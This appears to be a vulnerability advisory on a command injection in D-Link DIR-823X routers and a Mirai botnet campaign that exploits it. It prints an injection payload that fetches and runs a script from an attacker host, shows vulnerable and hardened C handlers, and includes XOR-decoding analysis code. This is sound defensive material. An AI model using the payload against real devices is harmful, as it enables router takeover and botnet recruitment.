What is the D-Link DIR-823X?
The D-Link DIR-823X is an AX3000 dual-band Wi-Fi 6 (802.11ax) router targeted at home users and small offices. Like most consumer-grade D-Link routers, it gained wide deployment due to its low price point and broad ISP bundling.
D-Link routers are perennial targets for Mirai-family botnets. Once compromised, they are recruited into DDoS-for-hire infrastructure. Because these devices sit at the network edge with internet-facing management interfaces, a single exploitable vulnerability can affect thousands of homes and small businesses simultaneously.
Overview
CVE-2025-29635 is a command injection (CWE-77) vulnerability in the web management interface of the D-Link DIR-823X router. An authenticated attacker who can send a POST request to the /goform/set_prohibiting endpoint can inject arbitrary OS commands through the macaddr parameter; the commands execute with root privileges on the router.
By early March 2026, a Mirai botnet variant called "tuxnokill" was actively exploiting this flaw — roughly one year after public disclosure — to conscript EoL D-Link routers into a DDoS botnet.
Affected Versions
| Firmware Version | Status |
|---|---|
| 240126 | Vulnerable — no patch |
| 240802 | Vulnerable — no patch |
| All versions | No fix planned (EoL device) |
Technical Details
The vulnerability resides in the /goform/set_prohibiting handler in the router's web server. The macaddr POST parameter is copied into a command buffer via snprintf() without any sanitization, then passed directly to system() for execution:
POST /goform/set_prohibiting HTTP/1.1
...
macaddr=; wget http://attacker.com/payload.sh -O /tmp/x; sh /tmp/x ;
Because the router's web process runs as root, the injected command executes with full system privileges. The attack requires admin credentials (the CVSS vector marks Privileges Required: High) and network reach to the management interface, either a WAN-exposed remote-management port or a foothold on the LAN. In practice D-Link routers are frequently left on default credentials, so authentication is a low barrier.
CWE-77 (Command Injection) is the general class: untrusted input changes the command a program runs, including cases where an injected argument alters the command's meaning without any shell metacharacters. CWE-78 (OS Command Injection) is its OS-specific child. Since the macaddr value reaches system(), the DIR-823X flaw is exploited exactly like an OS command injection: shell metacharacters (; | && $()) terminate the intended command and append the attacker's.
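The snprintf-then-system() pattern described above, reconstructed as an added example beside a hardened handler. This is not code from the DIR-823X firmware: the iptables command line, the binary path /usr/sbin/iptables and every function name are assumptions made for illustration, since the real handler's command string is not public. The hardened path does two independent things, positive validation of the MAC format and execv() with an argv vector so that no shell ever parses the value.

```c
/* Added example, not code from the DIR-823X firmware: a minimal
 * reconstruction of the pattern the page describes for the
 * /goform/set_prohibiting handler, beside a hardened version.
 * ASSUMPTIONS: the iptables command line, the binary path and all
 * function names are illustrative; the real handler's command is unknown. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define CMD_MAX 256
#define ARGV_MAX 10

/* Vulnerable pattern: macaddr is interpolated into a shell command with
 * snprintf() and the result goes to system(). Returns 0 on success. */
int build_block_cmd_unsafe(const char *macaddr, char *cmd, size_t n)
{
    int w = snprintf(cmd, n,
                     "iptables -A FORWARD -m mac --mac-source %s -j DROP",
                     macaddr);
    return (w < 0 || (size_t)w >= n) ? -1 : 0;
}

/* The web server runs as root, so whatever the shell parses out of the
 * injected value ("; wget ... ; sh /tmp/x ;") runs as root too. */
void set_prohibiting_vulnerable(const char *macaddr)
{
    char cmd[CMD_MAX];
    if (build_block_cmd_unsafe(macaddr, cmd, sizeof cmd) == 0)
        system(cmd);
}

/* Hardened step 1: positive validation. Accept only the canonical
 * aa:bb:cc:dd:ee:ff form; anything else is rejected before a command exists. */
int is_valid_mac(const char *s)
{
    if (s == NULL || strlen(s) != 17)
        return 0;
    for (int i = 0; i < 17; i++) {
        if (i % 3 == 2) {
            if (s[i] != ':')
                return 0;
        } else if (!isxdigit((unsigned char)s[i])) {
            return 0;
        }
    }
    return 1;
}

/* Hardened step 2: build an argv vector instead of a shell string. Even if
 * validation were bypassed, execv() never invokes a shell, so metacharacters
 * would reach iptables as one literal argument. Returns argc, or -1. */
int build_block_argv_safe(const char *macaddr, const char *argv[], size_t maxargs)
{
    const char *fixed[] = { "/usr/sbin/iptables", "-A", "FORWARD",
                            "-m", "mac", "--mac-source", macaddr,
                            "-j", "DROP" };
    size_t argc = sizeof fixed / sizeof fixed[0];
    if (maxargs < argc + 1 || !is_valid_mac(macaddr))
        return -1;
    for (size_t i = 0; i < argc; i++)
        argv[i] = fixed[i];
    argv[argc] = NULL;
    return (int)argc;
}

/* Returns iptables' exit status, or -1 if the input was rejected (the
 * handler should then answer HTTP 400 and log the attempt). */
int set_prohibiting_safe(const char *macaddr)
{
    const char *argv[ARGV_MAX];
    if (build_block_argv_safe(macaddr, argv, ARGV_MAX) < 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(argv[0], (char *const *)argv);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* The page's payload, as the handler would see it after URL decoding. */
    const char *payload = "; wget http://attacker.com/payload.sh -O /tmp/x; sh /tmp/x ;";
    char cmd[CMD_MAX];

    build_block_cmd_unsafe(payload, cmd, sizeof cmd);
    printf("vulnerable handler would run: %s\n", cmd);   /* shown, not executed */
    printf("hardened handler result: %d (rejected)\n", set_prohibiting_safe(payload));
    return 0;
}
```

Validation alone is not enough on its own: an allow-list for one parameter is easy to forget on the next one. Replacing system() with an exec family call removes the shell from the path for every handler, which is why the hardened version does both.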
Discovery
Discovered and reported by Wang Jinshuai and Zhao Jiangting. A public PoC was briefly available on GitHub before being removed.
Exploitation Context
Mirai "tuxnokill" Campaign
In early March 2026, Akamai SIRT analysts detected active exploitation attempts against CVE-2025-29635 via their global honeypot network. The campaign delivers a Mirai-variant dropper named tuxnokill:
- Attackers send crafted POST requests that download and execute dlink.sh from attacker-controlled infrastructure
- The dropper contacts a C2 server at 64.89.161[.]130:44300
- The payload uses XOR encoding (key 0x30), a standard Mirai obfuscation
- Infected routers are added to a botnet used for large-scale DDoS attacks
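The single-byte XOR encoding noted above is the kind of obfuscation an analyst strips by hand. The following added example (not code from tuxnokill or any Mirai source) goes one step beyond the page: instead of assuming the key, it recovers it by trying all 256 values against a substring the config is expected to contain, then decodes and defangs the result. SAMPLE_BLOB is constructed for this example by XOR-encoding the page's C2 string "64.89.161.130:44300" with 0x30; it is not bytes from the real sample, and a real config carries more than one string.

```c
/* Added example, not code from tuxnokill or any Mirai source: recovering a
 * single-byte XOR key (the page reports 0x30) from an obfuscated config blob,
 * then decoding it. ASSUMPTION: SAMPLE_BLOB was constructed for this example
 * by XOR-encoding "64.89.161.130:44300" with 0x30; it is not bytes taken from
 * the real sample. */
#include <stdio.h>
#include <string.h>

/* Constructed sample: "64.89.161.130:44300" ^ 0x30. Note the embedded 0x00
 * bytes ('0' ^ 0x30): the blob must be handled by length, never as a C string,
 * and a plain `strings` pass over the binary will not show the C2 address. */
static const unsigned char SAMPLE_BLOB[] = {
    0x06, 0x04, 0x1e, 0x08, 0x09, 0x1e, 0x01, 0x06, 0x01, 0x1e,
    0x01, 0x03, 0x00, 0x0a, 0x04, 0x04, 0x03, 0x00, 0x00
};
#define SAMPLE_BLOB_LEN (sizeof SAMPLE_BLOB)

/* Try every key; return the one under which `needle` appears in the blob,
 * or -1. The needle is a substring the config is expected to contain, here
 * the ":443" inside the C2 port. */
int recover_xor_key(const unsigned char *blob, size_t len, const char *needle)
{
    size_t nlen = strlen(needle);
    if (nlen == 0 || nlen > len)
        return -1;
    for (int key = 0; key < 256; key++) {
        for (size_t i = 0; i + nlen <= len; i++) {
            size_t j = 0;
            while (j < nlen && (blob[i + j] ^ key) == (unsigned char)needle[j])
                j++;
            if (j == nlen)
                return key;
        }
    }
    return -1;
}

/* Decode `len` bytes with `key` into `out` (NUL-terminated). Returns the
 * number of bytes decoded, or 0 if `out` is too small. */
size_t xor_decode(const unsigned char *blob, size_t len, unsigned char key,
                  char *out, size_t outn)
{
    if (outn < len + 1)
        return 0;
    for (size_t i = 0; i < len; i++)
        out[i] = (char)(blob[i] ^ key);
    out[len] = '\0';
    return len;
}

/* Defang an IPv4 indicator for a report: "1.2.3.4" -> "1[.]2[.]3[.]4".
 * Returns the length written, or 0 if `out` is too small. */
size_t defang(const char *s, char *out, size_t outn)
{
    size_t o = 0;
    for (; *s; s++) {
        size_t need = (*s == '.') ? 3 : 1;
        if (o + need + 1 > outn)
            return 0;
        if (*s == '.') {
            memcpy(out + o, "[.]", 3);
            o += 3;
        } else {
            out[o++] = *s;
        }
    }
    out[o] = '\0';
    return o;
}

int main(void)
{
    char plain[64], report[128];
    int key = recover_xor_key(SAMPLE_BLOB, SAMPLE_BLOB_LEN, ":443");
    if (key < 0) {
        puts("no key found");
        return 1;
    }
    xor_decode(SAMPLE_BLOB, SAMPLE_BLOB_LEN, (unsigned char)key, plain, sizeof plain);
    defang(plain, report, sizeof report);
    printf("key=0x%02x c2=%s\n", key, report);
    return 0;
}
```

The known-substring search is the generic move: for a real sample the needle would be whatever the family reliably embeds (a port, a User-Agent, a busybox path), and the same loop works for any single-byte key, not just 0x30.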
The same threat actor simultaneously exploited CVE-2023-1389 (TP-Link AX21) and a ZTE ZXV10 H108L RCE, indicating a systematic campaign targeting multiple EoL consumer routers.
Why EoL Devices Are Prime Botnet Targets
EoL routers represent ideal botnet fodder: they have permanent, unpatched vulnerabilities; they are internet-connected 24/7; their owners rarely monitor them; and there is no vendor mechanism to push patches. The one-year gap between disclosure (March 2025) and mass exploitation (March 2026) is common for EoL devices: because no patch will ever shrink the vulnerable population, an attacker loses nothing by waiting, and a public PoC can be folded into a botnet's exploit set whenever it is convenient.
Remediation
- Replace the DIR-823X immediately. D-Link's official recommendation (SAP10469) is to retire and replace the device. Any replacement should be a currently supported model with an active patch lifecycle.
- Disable remote management — if you cannot replace the device immediately, disable WAN-side access to the management interface. This blocks network-reachable exploitation but does not protect against LAN-side attacks.
- Change default admin credentials — this raises the bar above completely unauthenticated attacks (the CVSS vector requires High privileges, but many devices still use the default admin/admin).
- Monitor your network for unusual outbound traffic to unknown IPs — a compromised router will beacon to its C2.
- Review D-Link's EoL list for other devices in your environment: https://www.dlink.com/en/end-of-life-policy
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2025-29635 |
| Vendor / Product | D-Link — DIR-823X |
| NVD Published | 2025-03-25 |
| NVD Last Modified | 2026-04-24 |
| CVSS 3.1 Score | 7.2 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
| Severity | HIGH |
| CWE | CWE-77 — Improper Neutralization of Special Elements used in a Command |
| CISA KEV Added | 2026-04-24 |
| CISA KEV Deadline | 2026-05-08 |
| Known Ransomware Use | No |
CVSS 3.1 Breakdown
| Metric | Value |
|---|---|
| Attack Vector (AV) | Network |
| Attack Complexity (AC) | Low |
| Privileges Required (PR) | High (valid admin session) |
| User Interaction (UI) | None |
| Scope (S) | Unchanged |
| Confidentiality / Integrity / Availability | High / High / High |
Required Action
Discontinue use of the product. No patch exists or is planned, so the BOD 22-01 deadline of 2026-05-08 can only be met by retiring the device (see Remediation).
Timeline
| Date | Event |
|---|---|
| 2025-03-11 | CVE reserved |
| 2025-03-25 | CVE published |
| 2026-03-01 | Active exploitation detected by Akamai SIRT honeypots — Mirai 'tuxnokill' campaign |
| 2026-04-24 | Added to CISA Known Exploited Vulnerabilities Catalog |
| 2026-05-08 | CISA BOD 22-01 remediation deadline — discontinue use |
References
| Resource | Type |
|---|---|
| NVD — CVE-2025-29635 | Vulnerability Database |
| CISA KEV Catalog Entry | US Government |
| D-Link Security Advisory SAP10469 — DIR-823X End-of-Life / EoS | Vendor Advisory |
| CVE-2025-29635: Mirai Campaign Targets D-Link Devices — Akamai SIRT | Security Research |
| New Mirai campaign exploits RCE flaw in EoL D-Link routers — BleepingComputer | News |
| Mirai botnet exploits CVE-2025-29635 to target legacy D-Link routers — Security Affairs | News |
| CWE-77 — Improper Neutralization of Special Elements used in a Command | Weakness Classification |